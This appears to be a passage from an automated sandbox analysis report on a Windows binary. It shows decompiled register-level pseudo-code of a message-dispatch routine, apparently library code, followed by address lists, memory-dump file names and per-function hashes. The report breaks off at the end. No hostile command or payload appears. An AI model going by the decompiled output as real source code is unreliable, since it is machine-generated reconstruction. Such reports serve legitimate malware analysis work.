												_push(__si & 0x0000ffff);
												__eax = E1000953E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E1000953E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E1000C796(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E1000822A(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000956A(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E1000F58C(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x5c;
												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E10009CDD(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000C796(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E1000CC1D(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000953E(__ebx, __ecx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E1000DA85(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E1000953E(__ebx, __ecx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E1000953E(__ebx, __ecx,  *(__ebp + 0xc)));
												_push(E1000953E(__ebx, __ecx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E1000CBA0(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E1000DA85(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E1000DA85(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E1000953E(__ebx, __ecx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E1000953E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E1000953E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000953E(__ebx, __ecx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E1000953E(__ebx, __ecx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
												E1000820E(_t234 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E1000DA85(__ebx, __ecx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E1000DA85(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E1000DA85(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000953E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t234 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E1000820E(_t234 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t234 + 0x10) - _t182[2];
								if( *(_t234 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t234 + 0x10) = _t205;
								E1000820E(_t234 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t234 + 8) - 0xc000;
								if( *(_t234 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E1000AC7C(_t198, _t231, _t231, _t233, _t233 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t234 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t234 + 0x14));
								if(_t169 != 0) {
									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
								}
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E1000820E(_t234 - 0x14);
								_t172 = 1;
								L40:
								return E10013A50(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t234 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t234 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t234 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
					goto L6;
				}
				_push( *(_t234 + 0x10));
				_push( *((intOrPtr*)(_t234 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x1000b24b
0x1000b24b
0x1000b252
0x1000b257
0x1000b25b
0x1000b25e
0x1000b265
0x1000b268
0x1000b271
0x1000b295
0x1000b298
0x1000b2c4
0x1000b2c7
0x1000b2ca
0x1000b2d7
0x1000b2d7
0x1000b2dc
0x1000b2df
0x1000b2f5
0x1000b2f5
0x1000b2f8
0x1000b2fa
0x1000b349
0x1000b34d
0x1000b35a
0x1000b35d
0x1000b363
0x1000b36e
0x1000b374
0x1000b377
0x1000b379
0x1000b3a9
0x1000b3a9
0x1000b3ac
0x1000b3b2
0x1000b3b4
0x1000b443
0x1000b443
0x1000b446
0x00000000
0x00000000
0x1000b3bc
0x1000b3c3
0x1000b3c5
0x1000b3c7
0x1000b40b
0x1000b410
0x1000b42e
0x1000b433
0x1000b435
0x1000b437
0x00000000
0x00000000
0x1000b419
0x1000b41b
0x1000b7d7
0x1000b7da
0x1000b7df
0x1000b7df
0x1000b7e2
0x1000b7e2
0x1000b7e3
0x1000b7e3
0x1000b7e6
0x1000b7e8
0x1000b7ea
0x1000b7ea
0x00000000
0x1000b7ea
0x1000b421
0x1000b423
0x1000b425
0x1000b42a
0x1000b42a
0x1000b42d
0x1000b42d
0x1000b439
0x1000b43c
0x1000b43e
0x1000b440
0x00000000
0x1000b440
0x1000b3c9
0x1000b3cc
0x1000b3cf
0x1000b3d4
0x1000b3d7
0x1000b3d9
0x00000000
0x00000000
0x1000b3de
0x1000b3e4
0x1000b3e9
0x1000b3f2
0x1000b3f5
0x1000b3f8
0x00000000
0x00000000
0x1000b3fe
0x00000000
0x1000b489
0x00000000
0x00000000
0x1000b493
0x00000000
0x00000000
0x1000b4ad
0x1000b4af
0x1000b4af
0x1000b4b2
0x1000b4b3
0x1000b4b6
0x1000b4ba
0x00000000
0x00000000
0x1000b4c9
0x1000b4cd
0x00000000
0x00000000
0x1000b4d4
0x1000b48a
0x1000b48a
0x1000b48c
0x00000000
0x00000000
0x1000b4d7
0x1000b4df
0x1000b4e2
0x1000b4e5
0x1000b4e9
0x1000b4ec
0x1000b4f1
0x1000b4f3
0x1000b4f7
0x1000b4fb
0x1000b4fe
0x1000b503
0x1000b505
0x1000b507
0x1000b50a
0x1000b50c
0x1000b511
0x1000b514
0x1000b519
0x1000b51b
0x1000b51d
0x1000b51d
0x1000b51b
0x1000b520
0x1000b520
0x1000b523
0x1000b524
0x1000b525
0x1000b528
0x1000b529
0x1000b52b
0x1000b52d
0x1000b531
0x1000b531
0x1000b531
0x1000b535
0x1000b538
0x1000b53b
0x1000b53f
0x00000000
0x00000000
0x1000b555
0x1000b55d
0x1000b560
0x1000b563
0x1000b566
0x1000b569
0x1000b56a
0x1000b56c
0x1000b570
0x1000b572
0x1000b576
0x1000b544
0x1000b544
0x1000b547
0x1000b54b
0x00000000
0x00000000
0x1000b57b
0x1000b57e
0x1000b57e
0x1000b581
0x1000b583
0x00000000
0x00000000
0x1000b595
0x1000b598
0x1000b599
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b5a8
0x1000b5a9
0x1000b5ac
0x1000b588
0x1000b588
0x1000b589
0x1000b4bf
0x1000b4bf
0x1000b4c0
0x1000b4c2
0x00000000
0x00000000
0x1000b7c7
0x00000000
0x00000000
0x1000b5b1
0x00000000
0x00000000
0x1000b5bd
0x1000b5bf
0x00000000
0x00000000
0x1000b5c6
0x1000b5c9
0x1000b5c9
0x1000b5cc
0x1000b5cd
0x00000000
0x00000000
0x1000b5dd
0x1000b5de
0x00000000
0x00000000
0x1000b5e3
0x1000b5e5
0x1000b5e5
0x1000b5e8
0x1000b5e9
0x00000000
0x00000000
0x1000b4a2
0x00000000
0x00000000
0x1000b498
0x1000b49a
0x00000000
0x00000000
0x1000b601
0x1000b608
0x1000b609
0x1000b60b
0x1000b60e
0x1000b60e
0x1000b60e
0x00000000
0x00000000
0x1000b617
0x00000000
0x00000000
0x1000b622
0x00000000
0x00000000
0x1000b62b
0x1000b62f
0x1000b630
0x1000b633
0x1000b637
0x00000000
0x00000000
0x1000b63e
0x00000000
0x00000000
0x1000b648
0x1000b641
0x1000b641
0x1000b61c
0x1000b61c
0x00000000
0x00000000
0x1000b64b
0x1000b64d
0x1000b64d
0x1000b650
0x1000b651
0x00000000
0x00000000
0x1000b65f
0x1000b662
0x1000b665
0x1000b668
0x1000b654
0x1000b654
0x1000b658
0x00000000
0x00000000
0x1000b66b
0x1000b66f
0x00000000
0x00000000
0x1000b679
0x1000b67c
0x1000b67c
0x1000b67f
0x1000b681
0x00000000
0x00000000
0x1000b68d
0x1000b690
0x1000b693
0x1000b696
0x1000b699
0x1000b69c
0x1000b69f
0x1000b6a2
0x1000b6b6
0x1000b6b7
0x00000000
0x1000b6b7
0x1000b6aa
0x1000b6ab
0x1000b6ae
0x00000000
0x00000000
0x1000b6bd
0x1000b5b4
0x1000b5b4
0x1000b5b6
0x00000000
0x00000000
0x1000b6c3
0x1000b6c4
0x1000b6c7
0x1000b6c9
0x00000000
0x00000000
0x1000b471
0x1000b474
0x1000b477
0x1000b47a
0x1000b47b
0x1000b47b
0x00000000
0x00000000
0x1000b6d0
0x1000b6d3
0x1000b6d4
0x1000b686
0x1000b686
0x1000b687
0x1000b611
0x1000b611
0x00000000
0x00000000
0x1000b6d9
0x1000b6dc
0x1000b6df
0x1000b6e2
0x1000b5ec
0x1000b5ec
0x1000b5ed
0x1000b5f0
0x1000b5f0
0x1000b5f2
0x00000000
0x00000000
0x1000b6e8
0x1000b6eb
0x1000b6ee
0x1000b6f1
0x1000b6f2
0x1000b6f6
0x1000b6f9
0x1000b6fa
0x1000b6fe
0x1000b6ff
0x1000b701
0x1000b703
0x1000b2b7
0x1000b2b7
0x1000b2b9
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b70b
0x1000b70e
0x1000b711
0x1000b714
0x1000b715
0x1000b719
0x1000b71c
0x1000b71d
0x1000b721
0x1000b722
0x1000b724
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b72b
0x1000b72d
0x1000b72f
0x1000b732
0x1000b734
0x00000000
0x00000000
0x1000b45b
0x1000b45b
0x1000b462
0x1000b467
0x1000b467
0x00000000
0x00000000
0x1000b740
0x1000b4a7
0x1000b4a7
0x1000b7c8
0x1000b7c8
0x00000000
0x00000000
0x1000b750
0x00000000
0x00000000
0x1000b756
0x1000b75a
0x00000000
0x00000000
0x1000b764
0x1000b767
0x1000b768
0x1000b76a
0x1000b76d
0x1000b76f
0x1000b775
0x1000b776
0x1000b776
0x1000b77b
0x1000b77f
0x00000000
0x00000000
0x1000b78e
0x1000b792
0x1000b5d1
0x1000b5d1
0x1000b7cb
0x1000b7cb
0x1000b7cd
0x00000000
0x00000000
0x1000b798
0x1000b79b
0x1000b79e
0x1000b7a1
0x1000b7a2
0x1000b7a6
0x1000b7a9
0x1000b7aa
0x1000b784
0x1000b784
0x00000000
0x00000000
0x1000b7b0
0x1000b7b3
0x1000b7b6
0x1000b7b9
0x1000b7ba
0x1000b7be
0x1000b7c1
0x1000b7c2
0x1000b785
0x1000b785
0x1000b787
0x00000000
0x00000000
0x1000b3fe
0x1000b44c
0x1000b44f
0x1000b44f
0x1000b44f
0x1000b456
0x00000000
0x1000b456
0x1000b37e
0x1000b380
0x1000b383
0x00000000
0x00000000
0x1000b385
0x1000b38b
0x1000b38e
0x1000b393
0x1000b395
0x00000000
0x00000000
0x1000b39b
0x1000b3a2
0x00000000
0x00000000
0x00000000
0x1000b3a4
0x1000b2fc
0x1000b300
0x00000000
0x00000000
0x1000b302
0x1000b308
0x1000b312
0x1000b312
0x1000b318
0x1000b322
0x1000b328
0x1000b32b
0x00000000
0x00000000
0x1000b32d
0x1000b33b
0x1000b341
0x1000b343
0x00000000
0x00000000
0x00000000
0x1000b343
0x1000b31a
0x1000b320
0x00000000
0x00000000
0x00000000
0x1000b320
0x1000b30a
0x1000b310
0x00000000
0x00000000
0x00000000
0x1000b2e1
0x1000b2ec
0x1000b2f1
0x1000b2f3
0x1000b289
0x1000b289
0x1000b7ed
0x1000b7ed
0x1000b7f2
0x1000b7f7
0x1000b7f7
0x1000b7f9
0x1000b800
0x1000b807
0x1000b469
0x1000b46e
0x1000b46e
0x00000000
0x1000b2f3
0x1000b2df
0x1000b29a
0x1000b29d
0x1000b29f
0x00000000
0x00000000
0x1000b2aa
0x1000b2ab
0x1000b2ac
0x1000b2b1
0x00000000
0x1000b2b1
0x1000b273
0x1000b278
0x1000b283
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1000B252

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: bbbcdb9e379c3d6a716208566e1770b36e13c0aadc5d37d2ffae4b5587713b97
Instruction ID: 5e0e5c791d0d1cb6bbb600b1b15132222e1b0b637e2183def735870ee82b4e20
Opcode Fuzzy Hash: bbbcdb9e379c3d6a716208566e1770b36e13c0aadc5d37d2ffae4b5587713b97
Instruction Fuzzy Hash: 8BF18F74504A09EFFB14CF54CC91EAE7BE9EF08390F108559F819AB296DB34EA00DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0472825D, Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

%^, xrefs: 047282EE

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %^
API String ID: 0-1104307165
Opcode ID: d507bdd1108f8a35ed53ab16148420782af7d7cd87da810577b2023930bc68d2
Instruction ID: 5ea70507f50a8c1143512ca5037649ab81888347075159fb374e508963bd2d2a
Opcode Fuzzy Hash: d507bdd1108f8a35ed53ab16148420782af7d7cd87da810577b2023930bc68d2
Instruction Fuzzy Hash: D45167B1608301AFD344DF26D68990BBBE2FBC4758F50891DF1858A260C3B5DA48CF92

Uniqueness

Uniqueness Score: -1.00%

Function 04742081, Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

@c , xrefs: 04742136

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: @c
API String ID: 0-3912749282
Opcode ID: 60f261edb06baa2a7a2ae26d2fb9920708fbb4b70a89653e832b127ba7b9a54a
Instruction ID: 696b3c356c37834ee77b2fb2b7dfedfee65e97aa5326a798ef82ce175b8311bd
Opcode Fuzzy Hash: 60f261edb06baa2a7a2ae26d2fb9920708fbb4b70a89653e832b127ba7b9a54a
Instruction Fuzzy Hash: E1515371C0021DABDF58CFE1DA4A5EEBBB1FF54318F208189D811B6261D3B51A5ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0473584C, Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

~5(, xrefs: 04735938

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ~5(
API String ID: 0-3803459168
Opcode ID: d30a7facaec085bc7f2fe6404976452e1daba4deaad7d463e1d5f242462cd882
Instruction ID: faa550675815496e0857a70f153ac317b83db36fff5a3edc4d91895ac8fc9b93
Opcode Fuzzy Hash: d30a7facaec085bc7f2fe6404976452e1daba4deaad7d463e1d5f242462cd882
Instruction Fuzzy Hash: 50413171D00209EBDF08DFE5C94A8EEBBB2FB44308F208159E021B6260D7B55A55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0473F93D, Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

U , xrefs: 0473F9F3

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: U
API String ID: 0-3805344323
Opcode ID: d66d8c19aeb5e3cd038e30fbe932c79d8043525516ee6d5374bd7ce97189e75d
Instruction ID: 5ecfc05c6aef364e0da5e3cf63409c0b85f0ef9f1efb3575785f7741c645d3e8
Opcode Fuzzy Hash: d66d8c19aeb5e3cd038e30fbe932c79d8043525516ee6d5374bd7ce97189e75d
Instruction Fuzzy Hash: 58410F72C01219EBCF18CFE4D94A9EEBBB5FB08304F608199D411B6260E7B42A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0473E5A8, Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

$}:, xrefs: 0473E5B8

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $}:
API String ID: 0-2627266855
Opcode ID: d623234c9bd7d377c7a20b689b9a9e287dac64818e0698918d451ffe917e0ec2
Instruction ID: 11d3b904a777cc87083cdcccafb55e09dc064c7ee2cefcd4a19e87f17ff222e0
Opcode Fuzzy Hash: d623234c9bd7d377c7a20b689b9a9e287dac64818e0698918d451ffe917e0ec2
Instruction Fuzzy Hash: 0D31AE71608346CBC718CE26D89942FBFE1EFD4785F10492EF58286362D27199888BC3

Uniqueness

Uniqueness Score: -1.00%

Function 0473D530, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Q, xrefs: 0473D5D4

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Q
API String ID: 0-650534144
Opcode ID: 0185b9e25b540da005e15bac70ab4ae3bdcdb93554686492e032f1199e0262ce
Instruction ID: e6145a1b7573ab35221421ed01bab2b77154ffed1f1ae4490dca2d7e4074ed90
Opcode Fuzzy Hash: 0185b9e25b540da005e15bac70ab4ae3bdcdb93554686492e032f1199e0262ce
Instruction Fuzzy Hash: DD313471E00219EFEB08CFE2D94A4EEBBB2FF44314F20805AD411B6251D7B56A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04725E78, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

lij, xrefs: 04725EAB

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: lij
API String ID: 0-1942645658
Opcode ID: 6b287bb2a6ce46fef4c0710da7a2bf9979dff831bd72136844aa873cb048a487
Instruction ID: 68740834dfa5fa3773a544d7b5d022dad2b6e1121e292b98c50f048ecb872aa2
Opcode Fuzzy Hash: 6b287bb2a6ce46fef4c0710da7a2bf9979dff831bd72136844aa873cb048a487
Instruction Fuzzy Hash: 4A31A972A193128FC311DE28C88565AFBE0FF98714F054A6DE89597302D770EA09CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0472F71C, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

,Z5, xrefs: 0472F793

Memory Dump Source

